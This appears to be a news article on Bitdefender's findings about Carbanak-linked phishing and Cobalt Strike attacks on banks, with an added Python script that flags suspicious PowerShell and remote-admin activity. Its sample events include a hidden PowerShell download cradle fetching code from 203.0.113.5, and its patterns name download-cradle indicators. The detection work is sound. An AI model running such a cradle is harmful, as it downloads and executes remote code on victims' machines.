Following Saturday’s announcement by the Romanian Intelligence Service (SRI) of large-scale cyber attacks on Romanian banks, Bitdefender specialists give details of the attack and its alleged association with the Carbanak group.
Bitdefender, a global maker of security solutions, has recently investigated a series of advanced cyber attacks that targeted financial and banking institutions in order to steal large amounts of money through coordinated operations.
During the investigation, Bitdefender specialists identified components of the Cobalt Strike arsenal, associated with the Carbanak crime group, which has been known since 2013 for attacking over 100 banks in over 40 countries and is held responsible for financial damages of over one billion euros.
“The attacks were conducted through phishing campaigns sent to banks in Eastern Europe and Russia, generally in the first part of the week, Monday to Wednesday,” says Bitdefender’s security officer, Liviu Arsene.
Since March 2018, the phishing campaign has tried to trick bank employees into clicking infected links or downloading attachments from emails that appeared to come from someone inside their own organization. Once the attackers had a foothold on the target computer, they sought administrator privileges in order to move further into the company’s network. The criminals operated with surgical precision, infecting only a small number of devices so that they could remain undetected for as long as possible. Their preferred victims were employees with elevated privileges and broad access rights to the company’s IT infrastructure.
To avoid detection, the criminal groups frequently used fileless attack techniques, such as PowerShell or Cobalt Strike scripts, as well as legitimate remote-administration applications commonly used to connect to and manage the victim’s machine. In this case, the attackers operated outside business hours and planned to collect the money at weekends.
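The two behaviours described above, PowerShell-based fileless execution and legitimate remote-administration tools started outside business hours, are both visible in ordinary process-creation telemetry. The following is an added detection example, not code from Bitdefender or from the article: it scores constructed process-creation events (the pipe-separated log format, the business-hours window, the remote-admin-tool watch list and the indicator weights are all assumptions chosen for illustration) and reports the events whose combined score crosses a threshold.

```python
import re
from datetime import datetime
from typing import Dict, List

# Constructed sample process-creation events (not taken from the article).
# Format: timestamp | host | user | parent process | command line
SAMPLE_EVENTS = [
    "2018-06-12T10:14:03|WS-ACCT-07|corp\\j.popescu|outlook.exe|"
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBCAEMA",
    "2018-06-12T22:47:51|WS-ADMIN-02|corp\\admin.svc|cmd.exe|"
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')\"",
    "2018-06-13T09:02:10|WS-ACCT-07|corp\\j.popescu|explorer.exe|"
    "powershell.exe -File C:\\Scripts\\backup.ps1",
    "2018-06-16T03:15:00|WS-ADMIN-02|corp\\admin.svc|services.exe|"
    "TeamViewer_Service.exe",
]

BUSINESS_HOURS = range(7, 20)                                   # assumed policy: 07:00-19:59 local
OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe"}     # mail/Office client spawning a shell
REMOTE_ADMIN_TOOLS = ("teamviewer", "anydesk", "ammyy")          # assumed watch list, tune per site

# Command-line indicators for PowerShell: (name, weight, regex).
POWERSHELL_INDICATORS = [
    ("encoded_command", 3, re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I)),
    ("hidden_window",   2, re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("no_profile",      1, re.compile(r"\s-no(?:p|profile)\b", re.I)),
    ("download_cradle", 4, re.compile(
        r"(?:IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest)", re.I)),
]
ALERT_THRESHOLD = 3


def parse_event(line: str) -> Dict:
    """Split one pipe-separated event into its fields."""
    ts, host, user, parent, cmd = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user,
            "parent": parent.lower(), "cmd": cmd}


def score_event(ev: Dict) -> Dict:
    """Return the indicators that fired for one event and their summed weight."""
    hits: List[str] = []
    score = 0
    cmd = ev["cmd"]
    exe = cmd.split()[0].rsplit("\\", 1)[-1].lower()   # image name without its path

    if exe in ("powershell.exe", "pwsh.exe"):
        for name, weight, rx in POWERSHELL_INDICATORS:
            if rx.search(cmd):
                hits.append(name)
                score += weight
        if ev["parent"] in OFFICE_PARENTS:       # shell launched straight from a mail/Office client
            hits.append("office_parent")
            score += 3
    if any(tool in exe for tool in REMOTE_ADMIN_TOOLS):
        hits.append("remote_admin_tool")
        score += 1

    # Off-hours or weekend activity only counts when some other indicator already fired,
    # otherwise every night-time service start would raise an alert.
    ts = ev["ts"]
    if hits and (ts.hour not in BUSINESS_HOURS or ts.weekday() >= 5):
        hits.append("off_hours")
        score += 2
    return {"score": score, "hits": hits}


def triage(lines: List[str], threshold: int = ALERT_THRESHOLD) -> List[Dict]:
    """Return the events whose score reaches the threshold, in input order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        result = score_event(ev)
        if result["score"] >= threshold:
            alerts.append({"ts": ev["ts"].isoformat(), "host": ev["host"],
                           "user": ev["user"], **result})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["ts"], alert["host"], alert["user"], alert["score"], ",".join(alert["hits"]))
```

On the sample data the scheduled backup script (a plain `-File` invocation from Explorer during the day) scores zero, while the encoded, hidden-window shell spawned by Outlook, the night-time download cradle and the Saturday 03:15 remote-admin service start all cross the threshold. The weights are illustrative; in production they would be calibrated against a baseline of the bank's own legitimate PowerShell and remote-support usage.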
The FBI’s latest warning, issued after the attack on Cosmos Bank, that a wave of cyber attacks could target financial and banking institutions is corroborated by Bitdefender’s recent findings, which raise the alert level for banks in Eastern Europe and Russia.
Although it is too early to determine whether the USD 13.4 million loss at Cosmos Bank can be correlated with the attacks in Eastern Europe and Russia, the attacks investigated by Bitdefender might be part of the same global campaign the FBI warned of.
The preferred method in the final phase of these attacks involves remotely instructing ATMs to dispense cash at a predefined time, with members of the criminal group immediately collecting the money and transferring it to their own accounts. Another method was to modify account information databases while money was being withdrawn.